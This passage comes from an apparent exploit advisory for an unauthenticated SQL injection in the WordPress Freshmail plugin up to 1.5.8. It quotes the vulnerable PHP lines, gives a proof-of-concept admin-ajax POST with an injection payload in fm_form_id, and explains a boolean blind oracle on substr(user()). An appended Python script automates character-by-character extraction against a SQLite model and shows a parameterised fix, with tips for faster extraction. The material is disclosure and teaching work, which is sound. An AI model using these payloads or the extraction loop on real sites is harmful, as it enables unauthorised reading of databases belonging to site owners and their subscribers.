Content-Disposition: form-data; name="metakeyinput"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"

6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"

1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"

open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"

open
------WebKitFormBoundary384PE6lRgBcOibkL--

5. Solution
---------------

Update to version 1.6

------------------------
ISSUE 2:

# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary
------------------

Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them.

There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fm_form_id.

2. Vulnerability timeline
----------------------------------

- 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6

3. Vulnerable code
---------------------------

Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50

[...]
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result = $_POST;
[...]
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.$result['fm_form_id'].'";');
[...]

4. Proof of concept
---------------------------

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]

form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F

5. Explanation
---------------------

A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id="1" and the JSON message received will be similar to:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Your sign up request was successful! Please check your email inbox."}

The second time he tries to do the same with the same email the message returned will be:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Given email address is already subscribed, thank you!"}

If we insert 1" and substr(user(),1,1)="a we'll receive either the same message indicating that the Given email is already subscribed, indicating that the first character of the username is an "a", or a null message indicating that the username first character is not an "a".

6. Solution
---------------

Update to version 1.6

Source
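The two advisories above describe the same bug twice (an unsanitized form_id spliced into `select * from ..fm_forms where form_id="..."`) and a boolean oracle built on whether a row comes back. The following is an added example, not code from the advisory, the forum post or the Freshmail plugin: it rebuilds the vulnerable query over an in-memory SQLite table (constructed sample data), drives the same `substr(user(),N,1)` probe the advisory uses to pull the database user name out one character at a time, and shows the parameterised lookup that closes the hole. Assumptions, all labelled in the code: the table prefix is `wp_`, a fake `user()` function is registered because SQLite has none, and the payload uses single quotes instead of the plugin's MySQL double quotes because SQLite treats `"..."` as an identifier first.

```python
"""Boolean-based blind SQL injection modelled on the Freshmail fm_form_id flaw.

Added example (not the plugin's or the advisory's code). Runs offline against
an in-memory SQLite database with constructed sample data.
"""
import sqlite3
import string

PREFIX = "wp_"  # assumed WordPress table prefix, as $wpdb->prefix
# Character set tried at each position; covers a typical user@host value
ALPHABET = string.ascii_lowercase + string.digits + "@_."


def build_db() -> sqlite3.Connection:
    """Constructed sample database: one newsletter form and a stand-in user()."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}fm_forms (form_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute(f"INSERT INTO {PREFIX}fm_forms VALUES (1, 'newsletter')")
    # SQLite has no user(); MySQL's would return e.g. 'wpuser@localhost'. This
    # value is constructed for the example and is what the oracle will recover.
    conn.create_function("user", 0, lambda: "wpuser@localhost")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, fm_form_id: str):
    """Mirrors include/wp_ajax_fm_form.php line 50: the POST value is spliced into SQL.

    The plugin quotes the value with MySQL double quotes; single quotes are used
    here because SQLite resolves "..." as an identifier before a string literal.
    Returns the row (the plugin then reports 'already subscribed') or None.
    """
    sql = f"select * from {PREFIX}fm_forms where form_id='{fm_form_id}';"
    return conn.execute(sql).fetchone()


def safe_lookup(conn: sqlite3.Connection, fm_form_id: str):
    """Hardened form: cast to int and bind the value, the Python analogue of
    $wpdb->prepare('select * from ' . $wpdb->prefix . 'fm_forms where form_id = %d', $id).
    int() raises ValueError on anything that is not a plain integer."""
    sql = f"select * from {PREFIX}fm_forms where form_id = ?"
    return conn.execute(sql, (int(fm_form_id),)).fetchone()


def probe(conn: sqlite3.Connection, pos: int, ch: str) -> bool:
    """One oracle query: does character `pos` (1-based) of user() equal `ch`?

    The payload leaves its last quote open; the plugin's own closing quote
    completes the statement, exactly as 1" and substr(user(),1,1)="a does.
    """
    payload = f"1' and substr(user(),{pos},1)='{ch}"
    return vulnerable_lookup(conn, payload) is not None


def safe_probe(conn: sqlite3.Connection, pos: int, ch: str) -> bool:
    """Same probe against the hardened lookup: the cast rejects it, so the oracle is gone."""
    payload = f"1' and substr(user(),{pos},1)='{ch}"
    try:
        return safe_lookup(conn, payload) is not None
    except ValueError:
        return False


def extract(conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Recover user() character by character; stop at the first position where
    nothing in ALPHABET matches (substr past the end returns '')."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            if probe(conn, pos, ch):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("legit lookup      :", vulnerable_lookup(db, "1"))
    print("oracle, pos 1 = w :", probe(db, 1, "w"))
    print("recovered user()  :", extract(db))
    print("hardened, pos 1 = w:", safe_probe(db, 1, "w"))
```

Each call to `probe` is one admin-ajax POST in the real attack; `extract` needs at most `len(ALPHABET)` requests per character, and a production tool would cut that to about seven per character with a binary search on `ascii(substr(...))`, which the same oracle supports.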